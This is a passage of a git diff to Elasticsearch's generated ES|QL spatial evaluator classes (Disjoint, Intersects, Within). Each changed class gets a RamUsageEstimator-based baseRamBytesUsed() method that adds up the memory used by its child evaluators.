b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.java index 61302b49d2564..641a93bb0a11e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialDisjointCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.java index c09daa0f3f8d3..7332fedfb8bbf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialDisjointCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndConstantEvaluator.java index ac8c63a11ebbe..2047368567dfc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialDisjointCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointCartesianSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndSourceEvaluator.java index 77fae3ea04b23..063a8390526ab 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialDisjointCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointCartesianSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndConstantEvaluator.java index acba535905292..7ed07d00b18ac 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialDisjointGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointGeoPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndSourceEvaluator.java index a600b69f1ec34..d71472c4bebc6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialDisjointGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointGeoPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndConstantEvaluator.java index c3f535e9b2dad..77388c207ba52 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialDisjointGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointGeoSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndSourceEvaluator.java index b1d849749af60..d7bf9820e487c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialDisjointGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointGeoSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.java index f85521e790f93..136078ac482fe 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.java index 3575f6a4130ce..47c6d756caa0f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndConstantEvaluator.java index 02ad8b8e95c5f..23cd3ba1a1f19 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialIntersectsCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsCartesianSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndSourceEvaluator.java index 8d277443653ae..26649a35b56d8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialIntersectsCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsCartesianSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.java index 861bc6a7d8f91..392a53d92de7d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialIntersectsGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.java index 5b428fec29a5b..de9cd1a3c8cba 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialIntersectsGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndConstantEvaluator.java index 47b5e68d03bef..ac9bfccec01fd 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialIntersectsGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsGeoSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndSourceEvaluator.java index fdf6c21d4a05e..71c201dcfddf2 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialIntersectsGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsGeoSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndConstantEvaluator.java index f342bbdcdd2ca..dfaede0a64bb7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; 